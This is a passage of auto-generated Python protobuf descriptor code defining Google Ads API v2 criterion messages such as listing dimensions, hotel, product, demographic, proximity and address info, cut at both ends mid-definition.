serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='product_channel', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.product_channel', index=8,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='product_channel_exclusivity', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.product_channel_exclusivity', index=9,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='product_condition', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.product_condition', index=10,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='product_item_id', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.product_item_id', index=11,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='product_type', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.product_type', index=12,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='unknown_listing_dimension', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.unknown_listing_dimension', index=13,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='dimension', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.dimension',
index=0, containing_type=None, fields=[]),
],
serialized_start=2700,
serialized_end=3879,
)
_LISTINGBRANDINFO = _descriptor.Descriptor(
name='ListingBrandInfo',
full_name='google.ads.googleads.v2.common.ListingBrandInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='google.ads.googleads.v2.common.ListingBrandInfo.value', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3881,
serialized_end=3944,
)
_HOTELIDINFO = _descriptor.Descriptor(
name='HotelIdInfo',
full_name='google.ads.googleads.v2.common.HotelIdInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='google.ads.googleads.v2.common.HotelIdInfo.value', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3946,
serialized_end=4004,
)
_HOTELCLASSINFO = _descriptor.Descriptor(
name='HotelClassInfo',
full_name='google.ads.googleads.v2.common.HotelClassInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='google.ads.googleads.v2.common.HotelClassInfo.value', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4006,
serialized_end=4066,
)
_HOTELCOUNTRYREGIONINFO = _descriptor.Descriptor(
name='HotelCountryRegionInfo',
full_name='google.ads.googleads.v2.common.HotelCountryRegionInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='country_region_criterion', full_name='google.ads.googleads.v2.common.HotelCountryRegionInfo.country_region_criterion', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4068,
serialized_end=4156,
)
_HOTELSTATEINFO = _descriptor.Descriptor(
name='HotelStateInfo',
full_name='google.ads.googleads.v2.common.HotelStateInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='state_criterion', full_name='google.ads.googleads.v2.common.HotelStateInfo.state_criterion', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4158,
serialized_end=4229,
)
_HOTELCITYINFO = _descriptor.Descriptor(
name='HotelCityInfo',
full_name='google.ads.googleads.v2.common.HotelCityInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='city_criterion', full_name='google.ads.googleads.v2.common.HotelCityInfo.city_criterion', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4231,
serialized_end=4300,
)
_LISTINGCUSTOMATTRIBUTEINFO = _descriptor.Descriptor(
name='ListingCustomAttributeInfo',
full_name='google.ads.googleads.v2.common.ListingCustomAttributeInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='google.ads.googleads.v2.common.ListingCustomAttributeInfo.value', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='index', full_name='google.ads.googleads.v2.common.ListingCustomAttributeInfo.index', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4303,
serialized_end=4483,
)
_PRODUCTBIDDINGCATEGORYINFO = _descriptor.Descriptor(
name='ProductBiddingCategoryInfo',
full_name='google.ads.googleads.v2.common.ProductBiddingCategoryInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='google.ads.googleads.v2.common.ProductBiddingCategoryInfo.id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='country_code', full_name='google.ads.googleads.v2.common.ProductBiddingCategoryInfo.country_code', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='level', full_name='google.ads.googleads.v2.common.ProductBiddingCategoryInfo.level', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4486,
serialized_end=4714,
)
_PRODUCTCHANNELINFO = _descriptor.Descriptor(
name='ProductChannelInfo',
full_name='google.ads.googleads.v2.common.ProductChannelInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='channel', full_name='google.ads.googleads.v2.common.ProductChannelInfo.channel', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4716,
serialized_end=4819,
)
_PRODUCTCHANNELEXCLUSIVITYINFO = _descriptor.Descriptor(
name='ProductChannelExclusivityInfo',
full_name='google.ads.googleads.v2.common.ProductChannelExclusivityInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='channel_exclusivity', full_name='google.ads.googleads.v2.common.ProductChannelExclusivityInfo.channel_exclusivity', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4822,
serialized_end=4970,
)
_PRODUCTCONDITIONINFO = _descriptor.Descriptor(
name='ProductConditionInfo',
full_name='google.ads.googleads.v2.common.ProductConditionInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='condition', full_name='google.ads.googleads.v2.common.ProductConditionInfo.condition', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4972,
serialized_end=5083,
)
_PRODUCTITEMIDINFO = _descriptor.Descriptor(
name='ProductItemIdInfo',
full_name='google.ads.googleads.v2.common.ProductItemIdInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='google.ads.googleads.v2.common.ProductItemIdInfo.value', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5085,
serialized_end=5149,
)
_PRODUCTTYPEINFO = _descriptor.Descriptor(
name='ProductTypeInfo',
full_name='google.ads.googleads.v2.common.ProductTypeInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='google.ads.googleads.v2.common.ProductTypeInfo.value', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='level', full_name='google.ads.googleads.v2.common.ProductTypeInfo.level', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5152,
serialized_end=5299,
)
_UNKNOWNLISTINGDIMENSIONINFO = _descriptor.Descriptor(
name='UnknownListingDimensionInfo',
full_name='google.ads.googleads.v2.common.UnknownListingDimensionInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5301,
serialized_end=5330,
)
_HOTELDATESELECTIONTYPEINFO = _descriptor.Descriptor(
name='HotelDateSelectionTypeInfo',
full_name='google.ads.googleads.v2.common.HotelDateSelectionTypeInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.HotelDateSelectionTypeInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5332,
serialized_end=5456,
)
_HOTELADVANCEBOOKINGWINDOWINFO = _descriptor.Descriptor(
name='HotelAdvanceBookingWindowInfo',
full_name='google.ads.googleads.v2.common.HotelAdvanceBookingWindowInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='min_days', full_name='google.ads.googleads.v2.common.HotelAdvanceBookingWindowInfo.min_days', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_days', full_name='google.ads.googleads.v2.common.HotelAdvanceBookingWindowInfo.max_days', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5458,
serialized_end=5583,
)
_HOTELLENGTHOFSTAYINFO = _descriptor.Descriptor(
name='HotelLengthOfStayInfo',
full_name='google.ads.googleads.v2.common.HotelLengthOfStayInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='min_nights', full_name='google.ads.googleads.v2.common.HotelLengthOfStayInfo.min_nights', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_nights', full_name='google.ads.googleads.v2.common.HotelLengthOfStayInfo.max_nights', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5585,
serialized_end=5706,
)
_HOTELCHECKINDAYINFO = _descriptor.Descriptor(
name='HotelCheckInDayInfo',
full_name='google.ads.googleads.v2.common.HotelCheckInDayInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='day_of_week', full_name='google.ads.googleads.v2.common.HotelCheckInDayInfo.day_of_week', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5708,
serialized_end=5806,
)
_INTERACTIONTYPEINFO = _descriptor.Descriptor(
name='InteractionTypeInfo',
full_name='google.ads.googleads.v2.common.InteractionTypeInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.InteractionTypeInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5808,
serialized_end=5911,
)
_ADSCHEDULEINFO = _descriptor.Descriptor(
name='AdScheduleInfo',
full_name='google.ads.googleads.v2.common.AdScheduleInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='start_minute', full_name='google.ads.googleads.v2.common.AdScheduleInfo.start_minute', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='end_minute', full_name='google.ads.googleads.v2.common.AdScheduleInfo.end_minute', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='start_hour', full_name='google.ads.googleads.v2.common.AdScheduleInfo.start_hour', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='end_hour', full_name='google.ads.googleads.v2.common.AdScheduleInfo.end_hour', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='day_of_week', full_name='google.ads.googleads.v2.common.AdScheduleInfo.day_of_week', index=4,
number=5, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5914,
serialized_end=6269,
)
_AGERANGEINFO = _descriptor.Descriptor(
name='AgeRangeInfo',
full_name='google.ads.googleads.v2.common.AgeRangeInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.AgeRangeInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6271,
serialized_end=6361,
)
_GENDERINFO = _descriptor.Descriptor(
name='GenderInfo',
full_name='google.ads.googleads.v2.common.GenderInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.GenderInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6363,
serialized_end=6447,
)
_INCOMERANGEINFO = _descriptor.Descriptor(
name='IncomeRangeInfo',
full_name='google.ads.googleads.v2.common.IncomeRangeInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.IncomeRangeInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6449,
serialized_end=6548,
)
_PARENTALSTATUSINFO = _descriptor.Descriptor(
name='ParentalStatusInfo',
full_name='google.ads.googleads.v2.common.ParentalStatusInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.ParentalStatusInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6550,
serialized_end=6658,
)
_YOUTUBEVIDEOINFO = _descriptor.Descriptor(
name='YouTubeVideoInfo',
full_name='google.ads.googleads.v2.common.YouTubeVideoInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='video_id', full_name='google.ads.googleads.v2.common.YouTubeVideoInfo.video_id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6660,
serialized_end=6726,
)
_YOUTUBECHANNELINFO = _descriptor.Descriptor(
name='YouTubeChannelInfo',
full_name='google.ads.googleads.v2.common.YouTubeChannelInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='channel_id', full_name='google.ads.googleads.v2.common.YouTubeChannelInfo.channel_id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6728,
serialized_end=6798,
)
_USERLISTINFO = _descriptor.Descriptor(
name='UserListInfo',
full_name='google.ads.googleads.v2.common.UserListInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='user_list', full_name='google.ads.googleads.v2.common.UserListInfo.user_list', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6800,
serialized_end=6863,
)
_PROXIMITYINFO = _descriptor.Descriptor(
name='ProximityInfo',
full_name='google.ads.googleads.v2.common.ProximityInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='geo_point', full_name='google.ads.googleads.v2.common.ProximityInfo.geo_point', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='radius', full_name='google.ads.googleads.v2.common.ProximityInfo.radius', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='radius_units', full_name='google.ads.googleads.v2.common.ProximityInfo.radius_units', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='address', full_name='google.ads.googleads.v2.common.ProximityInfo.address', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6866,
serialized_end=7154,
)
_GEOPOINTINFO = _descriptor.Descriptor(
name='GeoPointInfo',
full_name='google.ads.googleads.v2.common.GeoPointInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='longitude_in_micro_degrees', full_name='google.ads.googleads.v2.common.GeoPointInfo.longitude_in_micro_degrees', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='latitude_in_micro_degrees', full_name='google.ads.googleads.v2.common.GeoPointInfo.latitude_in_micro_degrees', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7157,
serialized_end=7300,
)
_ADDRESSINFO = _descriptor.Descriptor(
name='AddressInfo',
full_name='google.ads.googleads.v2.common.AddressInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='postal_code', full_name='google.ads.googleads.v2.common.AddressInfo.postal_code', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='province_code', full_name='google.ads.googleads.v2.common.AddressInfo.province_code', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='country_code', full_name='google.ads.googleads.v2.common.AddressInfo.country_code', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='province_name', full_name='google.ads.googleads.v2.common.AddressInfo.province_name', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='street_address', full_name='google.ads.googleads.v2.common.AddressInfo.street_address', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='street_address2', full_name='google.ads.googleads.v2.common.AddressInfo.street_address2', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='city_name', full_name='google.ads.googleads.v2.common.AddressInfo.city_name', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7303,
serialized_end=7683,
)
_TOPICINFO = _descriptor.Descriptor(
name='TopicInfo',
full_name='google.ads.googleads.v2.common.TopicInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='topic_constant', full_name='google.ads.googleads.v2.common.TopicInfo.topic_constant', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
